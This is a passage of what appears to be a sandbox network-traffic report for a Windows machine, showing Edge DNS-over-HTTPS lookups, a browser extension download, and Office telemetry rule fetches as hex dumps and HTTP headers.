2024-11-11 23:06:26 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
2024-11-11 23:06:26 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:26 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eecc2dbcc43b-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:26 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0a 8d 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 c5 00 29 0f 70 72 6f 64 2d 61 67 69 63 2d 65 75 32 2d 32 07 65 61 73 74 75 73 32 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 83 00 06 00 01 00 00 00 3c 00 30 06 6e 73 31 2d 30 36 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 f1 00 0c 00 ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcomA&prod-atm-wds-edgetrafficmanagernetA)prod-agic-eu2-2eastus2cloudappazure,<0ns1-06azure-dns,msnhst"',:<)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49829	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:26 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcom)@<
2024-11-11 23:06:26 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:26 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eecc2eef7281-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:26 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 03 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0b 2e 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 bb 00 2a 0e 70 72 6f 64 2d 61 67 69 63 2d 63 75 2d 31 09 63 65 6e 74 72 61 6c 75 73 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 73 00 01 00 01 00 00 00 0a 00 04 04 f9 c8 94 00 00 29 04 d0 00 00 00 00 01 1c 00 0c 01 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcom.&prod-atm-wds-edgetrafficmanagernetA*prod-agic-cu-1centraluscloudappazure,s)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49837	142.251.40.129	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	594	OUT	GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:27 UTC	565	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135771 X-GUploader-UploadID: AHmUCY36LUuEXkenHX46oRyIUZ6Djv_wgY7mhacoIOFefz7aomRmaEYeiJnpZvT90c09MOlRkzQ X-Goog-Hash: crc32c=5YFIVw== Server: UploadServer Date: Mon, 11 Nov 2024 20:33:29 GMT Expires: Tue, 11 Nov 2025 20:33:29 GMT Cache-Control: public, max-age=31536000 Age: 9178 Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-11 23:06:27 UTC	813	IN	Data Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc 7e b6 70 ca 3d d5 33 ab Data Ascii: ?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.\|A\|aGoO{\TiZQ~p=3
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 ee 75 a8 ae 07 7e 6c 80 Data Ascii: xC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT\|uKCc$u~l
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 09 91 a0 a4 e8 82 d5 d0 Data Ascii: H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw\|D;havxL:t$!?\3K\|_#L]{kl8Ag&0)lmhf
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 2d 1d cf 3d 1a be 73 e7 Data Ascii: !3Mz0siOldC)'$Gp{C`;tequfB0DL^QbAdz=Z3)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w-=s
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 b4 ff a2 0b 44 8c 6c 9f Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?BrfDl
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 0a 53 59 ae f5 66 32 61 Data Ascii: ((h=:G,H$t;j@0]9~9H9O"ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\UskQX[j4O,8=q/m`Cbf\|Qa79SYf2a
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 21 00 dd 3a a8 e3 88 ec Data Ascii: {z0\|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&!:
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f ae 25 09 87 d3 41 99 c5 Data Ascii: TZr=G@1 Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/%A
2024-11-11 23:06:27 UTC	1378	IN	Data Raw: 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 73 73 61 67 65 73 2e 6a Data Ascii: v_\oiPRUk"<)1Z\|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/messages.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.5	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: a7e44230-001e-0082-7dd5-335880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f78459685726chC1EWRsnbg00000005ng00000000ctd9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 31c5dea7-101e-008d-51d5-3392e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f78459685m244hC1EWRgp2c00000005c000000000kwdf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: c8358df5-201e-005d-53d5-33afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f78459684bddphC1EWRbht400000005b000000000ayut x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.5	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
